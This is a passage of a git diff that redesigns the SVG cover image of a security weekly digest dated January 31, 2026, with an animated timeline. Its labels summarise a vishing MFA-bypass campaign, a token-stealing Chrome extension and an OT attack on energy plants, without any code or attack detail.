10h1v1h-1zM16 10h1v1h-1zM18 10h2v1h-2zM21 10h1v1h-1zM24 10h1v1h-1zM26 10h2v1h-2zM31 10h9v1h-9zM42 10h2v1h-2zM7 11h1v1h-1zM9 11h2v1h-2zM13 11h2v1h-2zM18 11h1v1h-1zM23 11h2v1h-2zM27 11h2v1h-2zM30 11h1v1h-1zM32 11h2v1h-2zM35 11h2v1h-2zM41 11h2v1h-2zM0 12h1v1h-1zM3 12h1v1h-1zM6 12h1v1h-1zM9 12h2v1h-2zM12 12h1v1h-1zM14 12h2v1h-2zM17 12h3v1h-3zM21 12h2v1h-2zM24 12h4v1h-4zM30 12h1v1h-1zM33 12h1v1h-1zM35 12h1v1h-1zM41 12h1v1h-1zM44 12h1v1h-1zM1 13h1v1h-1zM3 13h2v1h-2zM8 13h2v1h-2zM12 13h2v1h-2zM22 13h1v1h-1zM25 13h1v1h-1zM29 13h2v1h-2zM33 13h1v1h-1zM36 13h1v1h-1zM43 13h1v1h-1zM0 14h1v1h-1zM3 14h5v1h-5zM12 14h2v1h-2zM17 14h2v1h-2zM20 14h5v1h-5zM26 14h2v1h-2zM30 14h1v1h-1zM34 14h2v1h-2zM37 14h2v1h-2zM41 14h1v1h-1zM43 14h1v1h-1zM2 15h1v1h-1zM4 15h1v1h-1zM8 15h6v1h-6zM16 15h2v1h-2zM19 15h1v1h-1zM22 15h2v1h-2zM26 15h2v1h-2zM29 15h5v1h-5zM35 15h1v1h-1zM37 15h1v1h-1zM39 15h1v1h-1zM41 15h4v1h-4zM2 16h2v1h-2zM6 16h1v1h-1zM8 16h4v1h-4zM17 16h5v1h-5zM23 16h1v1h-1zM25 16h1v1h-1zM30 16h1v1h-1zM34 16h2v1h-2zM2 17h2v1h-2zM11 17h3v1h-3zM15 17h1v1h-1zM19 17h1v1h-1zM21 17h1v1h-1zM23 17h1v1h-1zM25 17h1v1h-1zM28 17h3v1h-3zM32 17h1v1h-1zM35 17h3v1h-3zM40 17h2v1h-2zM44 17h1v1h-1zM0 18h3v1h-3zM4 18h1v1h-1zM6 18h4v1h-4zM11 18h1v1h-1zM17 18h1v1h-1zM19 18h1v1h-1zM22 18h4v1h-4zM28 18h2v1h-2zM31 18h2v1h-2zM34 18h2v1h-2zM38 18h1v1h-1zM40 18h2v1h-2zM43 18h1v1h-1zM0 19h1v1h-1zM3 19h1v1h-1zM8 19h1v1h-1zM10 19h1v1h-1zM12 19h4v1h-4zM19 19h1v1h-1zM23 19h4v1h-4zM29 19h2v1h-2zM35 19h1v1h-1zM37 19h2v1h-2zM40 19h4v1h-4zM0 20h1v1h-1zM2 20h1v1h-1zM4 20h7v1h-7zM13 20h3v1h-3zM17 20h8v1h-8zM26 20h1v1h-1zM30 20h2v1h-2zM34 20h1v1h-1zM36 20h8v1h-8zM2 21h1v1h-1zM4 21h1v1h-1zM8 21h1v1h-1zM13 21h1v1h-1zM15 21h2v1h-2zM20 21h1v1h-1zM24 21h4v1h-4zM29 21h4v1h-4zM35 21h2v1h-2zM40 21h5v1h-5zM0 22h1v1h-1zM4 22h1v1h-1zM6 22h1v1h-1zM8 22h2v1h-2zM11 22h1v1h-1zM14 22h1v1h-1zM16 22h1v1h-1zM18 22h1v1h-1zM20 22h1v1h-1zM22 22h1v1h-1zM24 22h1v1h-1zM27 22h2v1h-2zM31 22h6v1h-6zM38 22h1v1h-1zM40 22h1v1h-1zM42 22h2v1h-2zM0 23h5v1h-5zM8 23h2v1h-2zM11 23h2v1h-2zM14 23h7v1h-7zM24 23h2v1h-2zM28 23h1v1h-1zM30 23h1v1h-1zM32 23h1v1h-1zM36 23h1v1h-1zM40 23h5v1h-5zM0 24h1v1h-1zM2 24h7v1h-7zM13 24h1v1h-1zM18 24h1v1h-1zM20 24h7v1h-7zM29 24h3v1h-3zM35 24h7v1h-7zM1 25h5v1h-5zM13 25h1v1h-1zM17 25h3v1h-3zM21 25h5v1h-5zM27 25h1v1h-1zM29 25h4v1h-4zM35 25h1v1h-1zM37 25h3v1h-3zM42 25h1v1h-1zM44 25h1v1h-1zM0 26h2v1h-2zM3 26h1v1h-1zM5 26h3v1h-3zM11 26h1v1h-1zM13 26h1v1h-1zM15 26h1v1h-1zM18 26h1v1h-1zM20 26h3v1h-3zM26 26h1v1h-1zM31 26h7v1h-7zM39 26h3v1h-3zM43 26h1v1h-1zM0 27h2v1h-2zM3 27h1v1h-1zM7 27h1v1h-1zM10 27h5v1h-5zM16 27h1v1h-1zM18 27h1v1h-1zM20 27h1v1h-1zM24 27h2v1h-2zM27 27h1v1h-1zM31 27h3v1h-3zM35 27h1v1h-1zM39 27h1v1h-1zM42 27h1v1h-1zM0 28h1v1h-1zM2 28h3v1h-3zM6 28h1v1h-1zM8 28h1v1h-1zM10 28h1v1h-1zM14 28h2v1h-2zM19 28h1v1h-1zM25 28h1v1h-1zM29 28h2v1h-2zM38 28h1v1h-1zM40 28h1v1h-1zM1 29h3v1h-3zM9 29h1v1h-1zM12 29h1v1h-1zM14 29h2v1h-2zM20 29h1v1h-1zM22 29h2v1h-2zM25 29h1v1h-1zM29 29h5v1h-5zM35 29h1v1h-1zM38 29h1v1h-1zM41 29h1v1h-1zM43 29h2v1h-2zM0 30h3v1h-3zM4 30h1v1h-1zM6 30h1v1h-1zM10 30h2v1h-2zM13 30h1v1h-1zM15 30h1v1h-1zM18 30h2v1h-2zM21 30h1v1h-1zM24 30h1v1h-1zM26 30h1v1h-1zM30 30h1v1h-1zM33 30h2v1h-2zM36 30h1v1h-1zM39 30h1v1h-1zM42 30h2v1h-2zM0 31h3v1h-3zM4 31h2v1h-2zM7 31h1v1h-1zM9 31h3v1h-3zM13 31h2v1h-2zM16 31h1v1h-1zM19 31h2v1h-2zM23 31h1v1h-1zM25 31h2v1h-2zM29 31h2v1h-2zM32 31h1v1h-1zM35 31h2v1h-2zM38 31h2v1h-2zM41 31h2v1h-2zM0 32h5v1h-5zM6 32h1v1h-1zM8 32h4v1h-4zM16 32h2v1h-2zM19 32h2v1h-2zM25 32h2v1h-2zM29 32h1v1h-1zM33 32h1v1h-1zM36 32h1v1h-1zM39 32h1v1h-1zM41 32h1v1h-1zM43 32h1v1h-1zM0 33h1v1h-1zM4 33h1v1h-1zM12 33h2v1h-2zM15 33h1v1h-1zM17 33h1v1h-1zM20 33h1v1h-1zM22 33h2v1h-2zM25 33h1v1h-1zM29 33h2v1h-2zM35 33h1v1h-1zM38 33h1v1h-1zM42 33h1v1h-1zM44 33h1v1h-1zM4 34h1v1h-1zM6 34h9v1h-9zM17 34h2v1h-2zM21 34h1v1h-1zM25 34h1v1h-1zM27 34h1v1h-1zM32 34h1v1h-1zM36 34h1v1h-1zM40 34h1v1h-1zM43 34h1v1h-1zM1 35h4v1h-4zM8 35h1v1h-1zM10 35h1v1h-1zM12 35h1v1h-1zM15 35h1v1h-1zM17 35h3v1h-3zM23 35h2v1h-2zM27 35h5v1h-5zM34 35h6v1h-6zM41 35h3v1h-3zM0 36h1v1h-1zM3 36h2v1h-2zM6 36h1v1h-1zM9 36h2v1h-2zM12 36h3v1h-3zM18 36h1v1h-1zM20 36h6v1h-6zM29 36h3v1h-3zM33 36h1v1h-1zM36 36h5v1h-5zM42 36h2v1h-2zM8 37h1v1h-1zM11 37h3v1h-3zM16 37h2v1h-2zM19 37h2v1h-2zM24 37h1v1h-1zM28 37h4v1h-4zM35 37h2v1h-2zM40 37h5v1h-5zM0 38h7v1h-7zM9 38h2v1h-2zM13 38h2v1h-2zM17 38h4v1h-4zM22 38h1v1h-1zM24 38h2v1h-2zM27 38h1v1h-1zM31 38h1v1h-1zM33 38h4v1h-4zM38 38h1v1h-1zM40 38h1v1h-1zM42 38h2v1h-2zM0 39h1v1h-1zM6 39h1v1h-1zM8 39h1v1h-1zM11 39h3v1h-3zM15 39h3v1h-3zM19 39h2v1h-2zM24 39h6v1h-6zM33 39h1v1h-1zM35 39h2v1h-2zM40 39h5v1h-5zM0 40h1v1h-1zM2 40h3v1h-3zM6 40h1v1h-1zM8 40h2v1h-2zM11 40h2v1h-2zM17 40h2v1h-2zM20 40h7v1h-7zM29 40h3v1h-3zM34 40h8v1h-8zM43 40h2v1h-2zM0 41h1v1h-1zM2 41h3v1h-3zM6 41h1v1h-1zM8 41h5v1h-5zM15 41h1v1h-1zM18 41h1v1h-1zM21 41h1v1h-1zM23 41h1v1h-1zM25 41h1v1h-1zM28 41h5v1h-5zM38 41h1v1h-1zM41 41h1v1h-1zM43 41h2v1h-2zM0 42h1v1h-1zM2 42h3v1h-3zM6 42h1v1h-1zM8 42h1v1h-1zM12 42h3v1h-3zM17 42h1v1h-1zM19 42h1v1h-1zM24 42h1v1h-1zM26 42h1v1h-1zM28 42h1v1h-1zM31 42h7v1h-7zM41 42h1v1h-1zM43 42h1v1h-1zM0 43h1v1h-1zM6 43h1v1h-1zM9 43h1v1h-1zM11 43h1v1h-1zM13 43h2v1h-2zM20 43h1v1h-1zM22 43h2v1h-2zM27 43h1v1h-1zM29 43h4v1h-4zM34 43h2v1h-2zM37 43h1v1h-1zM42 43h1v1h-1zM0 44h7v1h-7zM8 44h4v1h-4zM13 44h2v1h-2zM16 44h4v1h-4zM22 44h5v1h-5zM30 44h1v1h-1zM34 44h3v1h-3zM38 44h4v1h-4zM43 44h1v1h-1z"/>
+  </g>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
 </svg>

--- a/assets/images/2026-01-31-Tech_Security_Weekly_Digest_ShinyHunters_Vishing_Chrome_Extension_OT_Attack.svg
+++ b/assets/images/2026-01-31-Tech_Security_Weekly_Digest_ShinyHunters_Vishing_Chrome_Extension_OT_Attack.svg
@@ -1,134 +1,394 @@
-<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
-  <title>Security Weekly Digest - January 31, 2026</title>
-  <defs>
-    <linearGradient id="bg" x1="0%" y1="0%" x2="100%" y2="100%">
-      <stop offset="0%" stop-color="#0a0e1a"/>
-      <stop offset="60%" stop-color="#0f1628"/>
-      <stop offset="100%" stop-color="#141b2d"/>
-    </linearGradient>
-    <linearGradient id="hg" x1="0%" y1="0%" x2="100%" y2="0%">
-      <stop offset="0%" stop-color="#1e293b"/>
-      <stop offset="100%" stop-color="#0f172a"/>
-    </linearGradient>
-    <filter id="glow" x="-50%" y="-50%" width="200%" height="200%">
-      <feGaussianBlur stdDeviation="18"/>
-    </filter>
-    <marker id="ar" markerWidth="8" markerHeight="8" refX="4" refY="4" orient="auto">
-      <path d="M0,0 L8,4 L0,8 Z" fill="#ef4444" opacity="0.7"/>
-    </marker>
-  </defs>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Research-based weekly digest cover: ShinyHunters vishing MFA bypass on SaaS platforms, malicious Chrome extension steals ChatGPT auth tokens, Poland CERT reports coordinated OT attack on 30+ wind and solar power plants">
+<!-- profile: high-quality-cover (L14 Timeline, research-based, batch1-locked) -->
+<title>Weekly digest 2026-01-31 timeline: ShinyHunters Vishing MFA bypass (Jan 29), Chrome Extension token theft (Jan 30), Poland OT energy attack (Jan 31)</title>
+<defs>
+  <linearGradient id="bgSpread" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#0A1226"/>
+    <stop offset="55%" stop-color="#0D1530"/>
+    <stop offset="100%" stop-color="#131038"/>
+  </linearGradient>
+  <linearGradient id="colA" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#122542"/>
+    <stop offset="100%" stop-color="#0A1830"/>
+  </linearGradient>
+  <linearGradient id="colB" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#2E1A0A"/>
+    <stop offset="100%" stop-color="#1E1006"/>
+  </linearGradient>
+  <linearGradient id="colC" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#2E1016"/>
+    <stop offset="100%" stop-color="#1E0A12"/>
+  </linearGradient>
+  <linearGradient id="timelineGrad" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#4ADE80" stop-opacity="0.2"/>
+    <stop offset="35%" stop-color="#3A86FF" stop-opacity="0.9"/>
+    <stop offset="65%" stop-color="#FFB703" stop-opacity="0.9"/>
+    <stop offset="100%" stop-color="#E63946"/>
+  </linearGradient>
+  <radialGradient id="glowBlue" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#3A86FF" stop-opacity="0.6"/>
+    <stop offset="100%" stop-color="#3A86FF" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowAmber" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FFB703" stop-opacity="0.6"/>
+    <stop offset="100%" stop-color="#FFB703" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowRed" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#E63946" stop-opacity="0.65"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </radialGradient>
+  <pattern id="dotGrid" x="0" y="0" width="40" height="40" patternUnits="userSpaceOnUse">
+    <circle cx="20" cy="20" r="0.8" fill="#2A3256" opacity="0.55"/>
+  </pattern>
+  <filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="2.6"/>
+    <feOffset dx="1" dy="3"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.55"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="textShadow" x="-5%" y="-5%" width="110%" height="110%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1.2"/>
+    <feOffset dx="0" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.8"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+</defs>
 
-  <rect width="1200" height="630" fill="url(#bg)"/>
+<rect width="1200" height="630" fill="url(#bgSpread)"/>
+<rect width="1200" height="630" fill="url(#dotGrid)"/>
 
-  <!-- Grid -->
-  <g opacity="0.04" stroke="#94a3b8" stroke-width="0.5">
-    <line x1="0" y1="105" x2="1200" y2="105"/><line x1="0" y1="210" x2="1200" y2="210"/>
-    <line x1="0" y1="315" x2="1200" y2="315"/><line x1="0" y1="420" x2="1200" y2="420"/>
-    <line x1="0" y1="525" x2="1200" y2="525"/>
-    <line x1="240" y1="0" x2="240" y2="630"/><line x1="480" y1="0" x2="480" y2="630"/>
-    <line x1="720" y1="0" x2="720" y2="630"/><line x1="960" y1="0" x2="960" y2="630"/>
+<!-- Background column glows -->
+<circle cx="240" cy="390" r="140" fill="url(#glowBlue)">
+  <animate attributeName="opacity" values="0.5;0.85;0.5" dur="6.4s" repeatCount="indefinite"/>
+</circle>
+<circle cx="620" cy="390" r="140" fill="url(#glowAmber)">
+  <animate attributeName="opacity" values="0.5;0.85;0.5" dur="5.6s" repeatCount="indefinite"/>
+</circle>
+<circle cx="1000" cy="390" r="140" fill="url(#glowRed)">
+  <animate attributeName="opacity" values="0.5;0.85;0.5" dur="7.0s" repeatCount="indefinite"/>
+</circle>
+
+<!-- Header stripe -->
+<rect x="0" y="0" width="1200" height="56" fill="#050813" opacity="0.92"/>
+<text x="36" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" fill="#8FB8FF" letter-spacing="2.5">WEEKLY DIGEST</text>
+<text x="1164" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="600" fill="#7DA3D9" letter-spacing="1.5" text-anchor="end">2026.01.31</text>
+<rect x="0" y="54" width="1200" height="2" fill="#8FB8FF" opacity="0.85">
+  <animate attributeName="opacity" values="0.4;1;0.4" dur="4.8s" repeatCount="indefinite"/>
+</rect>
+
+<!-- Starfield ambient dots (static) -->
+<g fill="#8FB8FF" opacity="0.45">
+  <circle cx="160" cy="78" r="1.2"/>
+  <circle cx="420" cy="86" r="1.0"/>
+  <circle cx="720" cy="80" r="1.3"/>
+  <circle cx="1040" cy="88" r="0.9"/>
+</g>
+
+<!-- Title block -->
+<text x="60" y="96" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="700" fill="#9FD3B0" letter-spacing="3">THIS WEEK  /  JAN 25 - 31</text>
+<text x="60" y="130" font-family="Inter, Helvetica, Arial, sans-serif" font-size="28" font-weight="800" fill="#F5F7FA" filter="url(#textShadow)">Three Threats Across Seven Days</text>
+
+<!-- Timeline axis -->
+<line x1="60" y1="170" x2="1140" y2="170" stroke="url(#timelineGrad)" stroke-width="3.4" stroke-linecap="round"/>
+<!-- Moving traveler dot along axis -->
+<circle r="5" fill="#F5F7FA" stroke="#8FB8FF" stroke-width="1.4">
+  <animate attributeName="cx" values="60;1140;60" dur="11s" repeatCount="indefinite"/>
+  <animate attributeName="cy" values="170;170;170" dur="11s" repeatCount="indefinite"/>
+  <animate attributeName="opacity" values="0;1;1;1;0" dur="11s" repeatCount="indefinite"/>
+</circle>
+
+<!-- Date tick labels: JAN 25 to JAN 31 (7 ticks) -->
+<g font-family="Inter, monospace" font-size="10" font-weight="700" fill="#7DA3D9">
+  <line x1="80" y1="163" x2="80" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="80" y="194" text-anchor="middle">JAN 25</text>
+  <line x1="260" y1="163" x2="260" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="260" y="194" text-anchor="middle">JAN 26</text>
+  <line x1="440" y1="163" x2="440" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="440" y="194" text-anchor="middle">JAN 27</text>
+  <line x1="620" y1="163" x2="620" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="620" y="194" text-anchor="middle">JAN 28</text>
+  <line x1="800" y1="163" x2="800" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="800" y="194" text-anchor="middle" fill="#3A86FF">JAN 29</text>
+  <line x1="960" y1="163" x2="960" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="960" y="194" text-anchor="middle" fill="#FFB703">JAN 30</text>
+  <line x1="1120" y1="163" x2="1120" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="1120" y="194" text-anchor="middle" fill="#F87171">JAN 31</text>
+</g>
+
+<!-- Anchor dots: Col A at JAN 29 (x=800), Col B at JAN 30 (x=960), Col C at JAN 31 (x=1120) -->
+<!-- But columns need to be evenly spaced at x=240, 620, 980 centers, so anchor visually above each -->
+<g transform="translate(240,170)">
+  <circle r="22" fill="url(#glowBlue)">
+    <animate attributeName="r" values="20;32;20" dur="2.8s" repeatCount="indefinite"/>
+    <animate attributeName="opacity" values="0.6;1;0.6" dur="2.8s" repeatCount="indefinite"/>
+  </circle>
+  <circle r="10" fill="#0A1B2E" stroke="#3A86FF" stroke-width="3" filter="url(#softShadow)"/>
+  <circle r="3.5" fill="#8FB8FF">
+    <animate attributeName="opacity" values="1;0.3;1" dur="1.6s" repeatCount="indefinite"/>
+  </circle>
+</g>
+<g transform="translate(620,170)">
+  <circle r="22" fill="url(#glowAmber)">
+    <animate attributeName="r" values="20;32;20" dur="2.8s" begin="0.4s" repeatCount="indefinite"/>
+    <animate attributeName="opacity" values="0.6;1;0.6" dur="2.8s" begin="0.4s" repeatCount="indefinite"/>
+  </circle>
+  <circle r="10" fill="#1E1006" stroke="#FFB703" stroke-width="3" filter="url(#softShadow)"/>
+  <circle r="3.5" fill="#FFD58A">
+    <animate attributeName="opacity" values="1;0.3;1" dur="1.8s" repeatCount="indefinite"/>
+  </circle>
+</g>
+<g transform="translate(980,170)">
+  <circle r="22" fill="url(#glowRed)">
+    <animate attributeName="r" values="20;32;20" dur="2.8s" begin="0.8s" repeatCount="indefinite"/>
+    <animate attributeName="opacity" values="0.6;1;0.6" dur="2.8s" begin="0.8s" repeatCount="indefinite"/>
+  </circle>
+  <circle r="10" fill="#1E0A14" stroke="#E63946" stroke-width="3" filter="url(#softShadow)"/>
+  <circle r="3.5" fill="#FCA5A5">
+    <animate attributeName="opacity" values="1;0.3;1" dur="1.7s" repeatCount="indefinite"/>
+  </circle>
+</g>
+
+<!-- Dashed connector lines from anchor dots to column tops -->
+<line x1="240" y1="180" x2="240" y2="216" stroke="#3A86FF" stroke-width="1.4" stroke-dasharray="3 3" opacity="0.7"/>
+<line x1="620" y1="180" x2="620" y2="216" stroke="#FFB703" stroke-width="1.4" stroke-dasharray="3 3" opacity="0.7"/>
+<line x1="980" y1="180" x2="980" y2="216" stroke="#E63946" stroke-width="1.4" stroke-dasharray="3 3" opacity="0.7"/>
+
+<!-- COL A: ShinyHunters Vishing (JAN 29) -->
+<g transform="translate(72,216)">
+  <rect x="0" y="0" width="336" height="374" rx="14" fill="url(#colA)" stroke="#3A86FF" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="336" height="4" fill="#3A86FF" opacity="0.7"/>
+  <g filter="url(#textShadow)">
+    <text x="20" y="28" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="700" fill="#8FB8FF" letter-spacing="2.4">HIGH  /  SOCIAL ENG</text>
+    <text x="20" y="54" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="800" fill="#F5F7FA">ShinyHunters Vishing</text>
+    <text x="20" y="76" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="500" fill="#BFC9D9">SaaS MFA bypass via voice phishing</text>
   </g>
-
-  <!-- Glow orbs -->
-  <circle cx="200" cy="300" r="200" fill="#ef4444" opacity="0.06" filter="url(#glow)"/>
-  <circle cx="600" cy="350" r="180" fill="#f59e0b" opacity="0.05" filter="url(#glow)"/>
-  <circle cx="1000" cy="300" r="180" fill="#3b82f6" opacity="0.06" filter="url(#glow)"/>
-
-  <!-- Header -->
-  <rect x="0" y="0" width="1200" height="80" fill="url(#hg)" opacity="0.9"/>
-  <rect x="0" y="78" width="1200" height="2" fill="#334155" opacity="0.8"/>
-  <g transform="translate(48,40)">
-    <path d="M0,-22 L18,-12 L18,3 C18,13 10,20 0,24 C-10,20 -18,13 -18,3 L-18,-12 Z" fill="#1e3a5f" stroke="#3b82f6" stroke-width="1.5"/>
-    <path d="M-7,1 L-2,6 L8,-5" stroke="#3b82f6" stroke-width="2.5" fill="none" stroke-linecap="round"/>
+  <!-- Scene: phone + wave + attacker avatar + MFA bypass badge -->
+  <g transform="translate(168,136)">
+    <g filter="url(#softShadow)">
+      <rect x="-52" y="-28" width="44" height="56" rx="6" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.6"/>
+      <rect x="-46" y="-20" width="32" height="26" rx="2" fill="#1E2A48"/>
+      <circle cx="-30" cy="18" r="4" fill="#3A86FF" opacity="0.7"/>
+      <text x="-30" y="-4" text-anchor="middle" font-family="Inter, monospace" font-size="6" font-weight="800" fill="#8FB8FF">CALL</text>
+    </g>
+    <g stroke="#3A86FF" stroke-width="1.4" fill="none" opacity="0.85">
+      <path d="M0 -8 Q14 -14 22 -6">
+        <animate attributeName="stroke-opacity" values="0.3;1;0.3" dur="1.5s" repeatCount="indefinite"/>
+      </path>
+      <path d="M0 0 Q16 -6 24 2"/>
+      <path d="M0 8 Q14 2 22 10">
+        <animate attributeName="stroke-opacity" values="0.3;1;0.3" dur="1.5s" begin="0.4s" repeatCount="indefinite"/>
+      </path>
+    </g>
+    <g filter="url(#softShadow)">
+      <circle cx="52" cy="0" r="14" fill="#122542" stroke="#3A86FF" stroke-width="1.6"/>
+      <circle cx="52" cy="-3" r="4" fill="#3A86FF"/>
+      <path d="M43 8 Q52 3 61 8 Q61 14 52 14 Q43 14 43 8 Z" fill="#3A86FF"/>
+      <text x="52" y="32" text-anchor="middle" font-family="Inter, monospace" font-size="7" font-weight="800" fill="#8FB8FF">ATTACKER</text>
+    </g>
+    <g transform="translate(-6,-48)">
+      <rect x="-30" y="-12" width="60" height="22" rx="4" fill="#1E0A14" stroke="#E63946" stroke-width="1.2"/>
+      <text x="0" y="3" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="800" fill="#F87171">MFA BYPASS</text>
+      <circle cx="-30" cy="0" r="2.5" fill="#E63946">
+        <animate attributeName="opacity" values="0.3;1;0.3" dur="1.1s" repeatCount="indefinite"/>
+      </circle>
+    </g>
   </g>
-  <text x="80" y="44" font-family="Arial,sans-serif" font-size="28" font-weight="700" fill="#f1f5f9">Security Weekly Digest</text>
-  <rect x="990" y="18" width="178" height="44" rx="6" fill="#1e293b" stroke="#334155" stroke-width="1"/>
-  <text x="1079" y="48" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#94a3b8" text-anchor="middle">January 31, 2026</text>
-
-  <!-- Card 1: SEC OPS -->
-  <rect x="32" y="100" width="220" height="120" rx="8" fill="#1a0505" stroke="#ef4444" stroke-width="1.5"/>
-  <circle cx="52" cy="120" r="6" fill="#ef4444"/>
-  <g transform="translate(142,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#ef4444" stroke-width="1.8"/>
+  <!-- Attack chain -->
+  <g transform="translate(28,200)">
+    <rect x="0" y="0" width="280" height="34" rx="6" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.2"/>
+    <circle cx="18" cy="17" r="7" fill="#3A86FF"/>
+    <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FFFFFF">1</text>
+    <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Vishing call + fake IT helpdesk</text>
+    <line x1="18" y1="38" x2="18" y2="50" stroke="#3A86FF" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,54)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#3A86FF"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FFFFFF">2</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">MFA reset + credential harvest</text>
+    </g>
+    <line x1="18" y1="92" x2="18" y2="104" stroke="#3A86FF" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,108)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#12283F" stroke="#8FB8FF" stroke-width="1.4"/>
+      <circle cx="18" cy="17" r="7" fill="#8FB8FF"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#0A1020">3</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="800" fill="#F5F7FA">SaaS unauthorized access</text>
+    </g>
   </g>
-  <text x="142" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#ef4444" text-anchor="middle">SEC OPS</text>
-  <!-- Card 2: THREAT INT -->
-  <rect x="268" y="100" width="220" height="120" rx="8" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1.5"/>
-  <circle cx="288" cy="120" r="6" fill="#f59e0b"/>
-  <g transform="translate(378,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#f59e0b" stroke-width="1.8"/>
+  <!-- KPI pill -->
+  <g transform="translate(28,334)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="280" height="32" rx="8" fill="#12283F" stroke="#3A86FF" stroke-width="1.6"/>
+    <text x="14" y="21" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#8FB8FF">SRC</text>
+    <text x="140" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="14" font-weight="900" fill="#F5F7FA">Mandiant</text>
+    <text x="266" y="21" text-anchor="end" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#8FB8FF">UNC3944</text>
   </g>
-  <text x="378" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#f59e0b" text-anchor="middle">THREAT INT</text>
-  <!-- Card 3: CLOUD SEC -->
-  <rect x="504" y="100" width="220" height="120" rx="8" fill="#0a1020" stroke="#3b82f6" stroke-width="1.5"/>
-  <circle cx="524" cy="120" r="6" fill="#3b82f6"/>
-  <g transform="translate(614,148)">
-    <path d="M-16,8 C-24,8 -26,-2 -20,-8 C-18,-18 -6,-22 4,-18 C8,-26 20,-26 24,-16 C30,-16 32,-8 28,0 C26,8 16,8 8,8 Z" fill="none" stroke="#3b82f6" stroke-width="1.8" transform="scale(0.65)"/>
+</g>
+
+<!-- COL B: Chrome Extension Token Theft (JAN 30) -->
+<g transform="translate(432,216)">
+  <rect x="0" y="0" width="336" height="374" rx="14" fill="url(#colB)" stroke="#FFB703" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="336" height="4" fill="#FFB703" opacity="0.7"/>
+  <g filter="url(#textShadow)">
+    <text x="20" y="28" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="700" fill="#FFB703" letter-spacing="2.4">HIGH  /  BROWSER</text>
+    <text x="20" y="54" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="800" fill="#F5F7FA">Chrome Extension Threat</text>
+    <text x="20" y="76" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="500" fill="#FFD58A">ChatGPT auth token hijack</text>
   </g>
